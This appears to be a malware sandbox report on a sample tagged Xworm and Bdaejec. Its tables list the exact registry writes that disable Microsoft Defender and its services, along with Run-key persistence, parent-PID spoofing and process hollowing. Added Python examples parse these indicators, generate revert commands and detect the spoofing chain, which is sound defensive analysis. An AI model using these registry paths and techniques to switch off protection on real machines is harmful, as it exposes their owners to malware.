Analysis Overview
SHA256
1ca064f8c8eb72cd0cfda466bb582318c93d2856a89bcf323b37d820f05fdc83
Threat Level: Known bad
The file x69.exe was found to be: Known bad.
Malicious Activity Summary
Gurcu, WhiteSnake
Suspicious use of NtCreateUserProcessOtherParentProcess
LatentBot
Bdaejec
Detect Xworm Payload
Contains code to disable Windows Defender
Xworm family
Modifies Windows Defender Real-time Protection settings
Modifies Windows Defender DisableAntiSpyware settings
Xworm
Gurcu family
Modifies security service
Detects Bdaejec Backdoor.
Bdaejec family
Latentbot family
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Reads user/profile data of web browsers
Drops startup file
Checks BIOS information in registry
Executes dropped EXE
Checks computer location settings
ASPack v2.12-2.42
Indicator Removal: Clear Windows Event Logs
Modifies Security services
Checks whether UAC is enabled
Looks up external IP address via web service
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Event Triggered Execution: Netsh Helper DLL
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Scheduled Task/Job: Scheduled Task
NTFS ADS
Suspicious use of FindShellTrayWindow
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Enumerates system info in registry
Suspicious use of UnmapMainImage
Uses Volume Shadow Copy service COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: AddClipboardFormatListener
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Modifies Control Panel
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-05-20 04:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-20 04:12
Reported
2025-05-20 04:14
Platform
win10v2004-20250502-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Bdaejec
Bdaejec family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Bdaejec Backdoor.
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LatentBot
Latentbot family
Modifies Windows Defender DisableAntiSpyware settings
Note: on current Windows 10/11 builds Defender ignores this policy value while Tamper Protection is on, so a successful write does not by itself prove that protection was lost on a real host. The indicator is the write itself: reg.exe setting Disable* values under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender (this section and the Real-Time Protection section below) is T1562.001 whatever its effect on the image.
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
Note: Start = 4 (SERVICE_DISABLED) written straight into the service key takes effect at the next boot; nothing goes through the Service Control Manager, so no service-stop event accompanies it. The driver and NIS entries under Modifies Security services below complete the set (WinDefend, WdFilter, WdBoot, WdNisDrv, WdNisSvc).
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
This signature fires when the process issuing the create-process call (here powershell.EXE, PIDs 4192 and 4348) is not the parent recorded for the new process (winlogon.exe, PID 616): parent-PID spoofing via the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS attribute, so that the child shows up under a trusted system process in any tree view built from the recorded parent.
| Description | Indicator | Process | Target |
| PID 4192 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 4348 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x69.lnk | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69Disable-winDefender = "C:\\Users\\Admin\\AppData\\Roaming\\x69Disable-winDefender.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69install = "C:\\Users\\Admin\\AppData\\Roaming\\x69install.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies Security services
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
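The registry sections above are one procedure seen from four angles: Defender policy switches (DisableAntiSpyware, the Real-Time Protection Disable* values), the WinDefend and Wd* service Start values set to 4, and the Run values under HKU pointing at copies in AppData\Roaming (Adds Run key to start application, alongside the Startup-folder .lnk). The block below is an added example, not code from the report or from the sample: it parses rows in the report's own table format, classifies each write against those three patterns, and produces the reg.exe / sc.exe command that reverts it. Assumptions: the rows in SAMPLE_ROWS are copied from the tables above except for one benign SecurityHealth Run entry added as a negative case; the stock Start values for the Defender services (WinDefend 2, WdFilter 0, WdBoot 0, WdNisDrv 3, WdNisSvc 3) and the ATT&CK IDs are mine; the revert commands assume an elevated prompt on a host where Tamper Protection does not already block the change.

```python
import re
from dataclasses import dataclass

# Constructed input: rows copied from the report's tables above, plus one benign
# Run-key row (SecurityHealth, a stock Windows entry) added as a negative case.
SAMPLE_ROWS = r"""
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x69 = "C:\\Users\\Admin\\AppData\\Roaming\\x69.exe" | C:\Users\Admin\AppData\Local\Temp\x69.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth = "C:\\Windows\\system32\\SecurityHealthSystray.exe" | C:\Windows\explorer.exe | N/A |
"""

ROW_RE = re.compile(r'^\|\s*(?P<desc>[^|]+?)\s*\|\s*(?P<ind>[^|]+?)\s*\|\s*(?P<proc>[^|]+?)\s*\|')
SETVAL_RE = re.compile(r'^(?P<path>.+?) = "(?P<data>.*)"$')
SERVICE_RE = re.compile(r'\\SYSTEM\\ControlSet\d+\\Services\\(?P<svc>[^\\]+)\\Start$', re.I)

POLICY_PREFIX = r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender".lower()
# Assumed stock Start values of the Defender services the sample sets to 4 (disabled):
# 0 = boot, 2 = auto, 3 = demand (manual).
DEFENDER_SERVICES = {"windefend": 2, "wdfilter": 0, "wdboot": 0, "wdnisdrv": 3, "wdnissvc": 3}
START_NAMES = {0: "boot", 1: "system", 2: "auto", 3: "demand"}
# Directories an unprivileged user can write to; a Run value pointing here is the
# persistence pattern in this report (x69.exe and friends under AppData\Roaming).
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK sub-technique ID (assigned here, not by the report)
    path: str        # registry value path as written in the report
    data: str
    process: str     # process that performed the write
    fix: str         # reg.exe / sc.exe command that reverts the write


def to_hive(path):
    r"""Translate the kernel-style \REGISTRY\MACHINE or \REGISTRY\USER prefix to HKLM/HKU."""
    for prefix, hive in ((r"\REGISTRY\MACHINE", "HKLM"), (r"\REGISTRY\USER", "HKU")):
        if path.upper().startswith(prefix):
            return hive + path[len(prefix):]
    return path


def parse_rows(text):
    """Yield (description, indicator, process) from rows in the report's table format."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m and m["desc"] != "Description":
            yield m["desc"], m["ind"], m["proc"]


def classify(desc, ind, proc):
    """Return a Finding for a Defender-tampering or persistence write, else None."""
    if not desc.startswith("Set value"):
        return None                      # key creation on its own is not actionable
    m = SETVAL_RE.match(ind)
    if not m:
        return None
    path, data = m["path"], m["data"]
    key, _, name = path.rpartition("\\")
    low = path.lower()
    # 1. Any Disable* switch set to 1 under the Defender policy key.
    if low.startswith(POLICY_PREFIX) and name.lower().startswith("disable") and data == "1":
        return Finding("T1562.001", path, data, proc, f'reg delete "{to_hive(key)}" /v {name} /f')
    # 2. A Defender service or driver set to Start=4 (disabled at next boot).
    svc = SERVICE_RE.search(path)
    if svc and svc["svc"].lower() in DEFENDER_SERVICES and data == "4":
        default = DEFENDER_SERVICES[svc["svc"].lower()]
        return Finding("T1562.001", path, data, proc, f"sc config {svc['svc']} start= {START_NAMES[default]}")
    # 3. A Run value whose target lives in a user-writable directory.
    if "\\microsoft\\windows\\currentversion\\run\\" in low:
        target = data.replace("\\\\", "\\").lower()     # the report doubles backslashes in data
        if any(frag in target for frag in USER_WRITABLE):
            return Finding("T1547.001", path, data, proc, f'reg delete "{to_hive(key)}" /v {name} /f')
    return None


def triage(text):
    """All findings from a block of report rows, in table order."""
    return [f for f in (classify(*row) for row in parse_rows(text)) if f]


if __name__ == "__main__":
    for f in triage(SAMPLE_ROWS):
        print(f"{f.technique}  {to_hive(f.path)} = {f.data}  by {f.process}\n    revert: {f.fix}")
```

Rule 1 deliberately keys on the value name rather than a fixed list, because the Real-Time Protection section above shows five different Disable* values and a sample can choose others; rule 3 is the reason the SecurityHealth row is ignored while the x69 row is flagged, since the only difference between them is where the target binary lives.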
Drops file in System32 directory
Note: the two powershell.EXE rows are the relevant ones. StartupProfileData-NonInteractive and the CLR usage log land under C:\Windows\system32\config\systemprofile, the LocalSystem profile, so this PowerShell instance is running as SYSTEM, consistent with the scheduled-task and WMI signatures above and with its ability to present winlogon.exe as its child's parent. The svchost.exe rows (UpdateOrchestrator tasks, CryptnetUrlCache) and the OfficeClickToRun.exe row are ordinary background activity on the image.
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4192 set thread context of 6124 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 4348 set thread context of 2636 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
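The two PowerShell PIDs in this section are the same ones that appear under Suspicious use of NtCreateUserProcessOtherParentProcess above: each creates a process with winlogon.exe recorded as parent and then sets the thread context of a dllhost.exe, which is the spoof-the-parent-then-hollow chain. The block below is an added example, not code from the report or the sample. It models the two record types a detection needs, process starts that carry both the recorded parent and the actual creator, and cross-process memory operations, and correlates them. Assumptions: the linkage of the spoofed-parent creations to dllhost.exe PIDs 6124 and 2636 is inferred from the matching PowerShell PIDs, not stated by the report; PIDs 580, 900, 904 and 7000 and the WriteProcessMemory record are constructed. The caveat that matters in practice: Sysmon Event ID 1 records only the (spoofed) parent, so the creator field has to come from a source that logs the calling process, such as the kernel process ETW provider's ProcessStart event or an EDR sensor.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcStart:
    pid: int
    image: str
    parent_pid: int    # parent recorded for the child (what Sysmon EID 1 / Task Manager show)
    creator_pid: int   # process whose thread actually issued the create-process call


@dataclass(frozen=True)
class MemoryOp:
    op: str            # "WriteProcessMemory" or "SetThreadContext"
    source_pid: int
    target_pid: int


@dataclass(frozen=True)
class Alert:
    child_pid: int
    child_image: str
    recorded_parent: int
    creator: int
    followed_by: tuple  # memory ops from the creator into the child, in order
    severity: str


# Constructed telemetry modelled on the report: powershell.EXE (4192, 4348) creates
# dllhost.exe with winlogon.exe (616) as recorded parent and then sets its thread
# context. winlogon/powershell/dllhost PIDs are the report's; 580, 900, 904 and
# 7000 are invented, and the third dllhost.exe is a benign control case.
STARTS = [
    ProcStart(616, r"C:\Windows\system32\winlogon.exe", 580, 580),
    ProcStart(4192, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE", 900, 900),
    ProcStart(4348, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE", 900, 900),
    ProcStart(6124, r"C:\Windows\System32\dllhost.exe", 616, 4192),
    ProcStart(2636, r"C:\Windows\System32\dllhost.exe", 616, 4348),
    ProcStart(7000, r"C:\Windows\System32\dllhost.exe", 904, 904),
]
OPS = [
    MemoryOp("WriteProcessMemory", 4192, 6124),   # constructed; the report shows only SetThreadContext
    MemoryOp("SetThreadContext", 4192, 6124),
    MemoryOp("SetThreadContext", 4348, 2636),
]


def detect_ppid_spoof(starts, ops):
    """Flag every process whose recorded parent is not the process that created it,
    and raise severity when the creator then writes into or redirects the child."""
    ops_by_pair = defaultdict(list)
    for o in ops:
        ops_by_pair[(o.source_pid, o.target_pid)].append(o.op)
    alerts = []
    for s in starts:
        if s.creator_pid == s.parent_pid:
            continue
        follow = tuple(ops_by_pair.get((s.creator_pid, s.pid), ()))
        severity = "high" if "SetThreadContext" in follow else "medium"
        alerts.append(Alert(s.pid, s.image, s.parent_pid, s.creator_pid, follow, severity))
    return alerts


def lineage(starts, pid, by_creator):
    """Image names from root to `pid`, following either the recorded parent chain
    (what a tree view shows) or the creator chain (what actually happened)."""
    by_pid = {s.pid: s for s in starts}
    chain = []
    while pid in by_pid:
        s = by_pid[pid]
        chain.append(s.image.rsplit("\\", 1)[-1])
        pid = s.creator_pid if by_creator else s.parent_pid
    return chain[::-1]


if __name__ == "__main__":
    for a in detect_ppid_spoof(STARTS, OPS):
        print(f"[{a.severity}] {a.child_image} (pid {a.child_pid}) recorded parent {a.recorded_parent}, "
              f"created by {a.creator}; then {', '.join(a.followed_by) or 'no memory ops'}")
        print("   apparent:", " -> ".join(lineage(STARTS, a.child_pid, by_creator=False)))
        print("   actual:  ", " -> ".join(lineage(STARTS, a.child_pid, by_creator=True)))
```

The mismatch alone is medium severity because legitimate software also uses the parent-process attribute (browsers, installers launched through a broker); it is the follow-on SetThreadContext from the same creator into the new child, a process that the report shows is a stock dllhost.exe, that makes this a hollowing chain rather than a quirk.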
Drops file in Program Files directory
Note: izTLZKj.exe and iyMbXS.exe open a long list of third-party executables (Java, Office, Chrome, Firefox, 7-Zip, Adobe Reader, Store apps) for modification, the footprint of a file infector. The table records the opens only, so whether each file was actually rewritten has to be established from the files themselves.
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\java-rmi.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\onenoteshare.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\AcroLayoutRecognizer.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Microsoft.MicrosoftSolitaireCollection.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Mail\wab.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Uninstall.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\jmap.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\wsgen.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\jp2launcher.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\GRAPH.EXE | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\MixedRealityPortal.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\klist.exe | C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\bin\javaw.exe | C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe | N/A |
